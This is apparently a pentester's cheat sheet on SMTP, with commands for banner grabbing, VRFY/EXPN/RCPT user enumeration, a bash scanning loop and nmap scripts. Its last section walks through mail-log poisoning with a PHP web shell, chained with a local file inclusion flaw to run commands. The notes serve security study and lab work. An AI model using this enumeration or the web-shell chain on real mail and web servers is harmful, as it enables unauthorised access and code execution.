SMTP Enum

Checklist

  • Check for version

  • Log file poisoning chained with an LFI (code execution)

  • User enumeration

Grab the banner and VRFY

nc -nv 10.11.12.8 25                   <--- the 220 banner usually names the MTA and version
VRFY bob
250 2.1.5 bob@redhat.active.com        <--- Output if user exists

VRFY idontexist
550 5.1.1 idontexist... User unknown   <--- Output if user does not exist

EXPN <list>: asks the server to expand a mailing list or alias into its member addresses (250 per member if it exists, 550 if not).

Hardened servers often refuse both VRFY and EXPN (Postfix disable_vrfy_command = yes, sendmail PrivacyOptions=novrfy,noexpn); the reply is then 502 or a blanket 252. RCPT TO after a MAIL FROM usually still answers 250 for a real user and 550 for an unknown one, so fall back to it.

Bash Script for SMTP

#!/bin/bash

# VRFY Script
#############
# numbers.txt: one last octet per line (hosts are 10.11.1.X)
# users.txt:   one username per line
# Only 250 replies are printed; nc's connection chatter on stderr is dropped.

while read -r ip; do
	while read -r user; do
		printf 'VRFY %s\r\n' "$user" | nc -nv -w 1 "10.11.1.$ip" 25 2>/dev/null \
			| grep "^250" | sed "s/^/10.11.1.$ip: /"
	done < users.txt
done < numbers.txt

SMTP nmap scripts

nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1

smtp-commands lists what the server advertises after EHLO; smtp-enum-users tries VRFY, EXPN and RCPT with a built-in username list (restrict the methods with the smtp-enum-users.methods script argument). The smtp-vuln-* scripts test for specific Exim and Postfix bugs, so they only mean something once the banner has told you which MTA and version you are talking to.

SMTP user enum

smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10

-M also accepts EXPN and RCPT; use RCPT when the server answers VRFY with 502/252.

Code Execution through SMTP/LFI

telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:someself@nodomain.io
rcpt to: username@localhost
data
Subject: Some Subject

<?php echo system($_REQUEST['cmd']); ?>
.

The blank line after the Subject header is required: headers, one empty line, then the body. A line holding only "." ends DATA; the server answers 250 ... queued when it accepted the message.

=================================================
Where the payload lands depends on the MTA. The message body is delivered to the recipient's mailbox file (commonly /var/mail/username or /var/spool/mail/username), while /var/log/mail.log records the envelope (sender, recipient, delivery status), not the body. So include the mailbox file when the body carries the PHP; if mail.log is the only file you can read, put the PHP in the MAIL FROM address instead, because the envelope addresses are what the server writes to the log.

Once the poisoned file is included through the LFI, pass the cmd parameter (the payload reads $_REQUEST, so GET or POST both work): ?cmd=id when it is the first parameter, &cmd=id when appended to the existing query string.

Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/mail/username&cmd=id
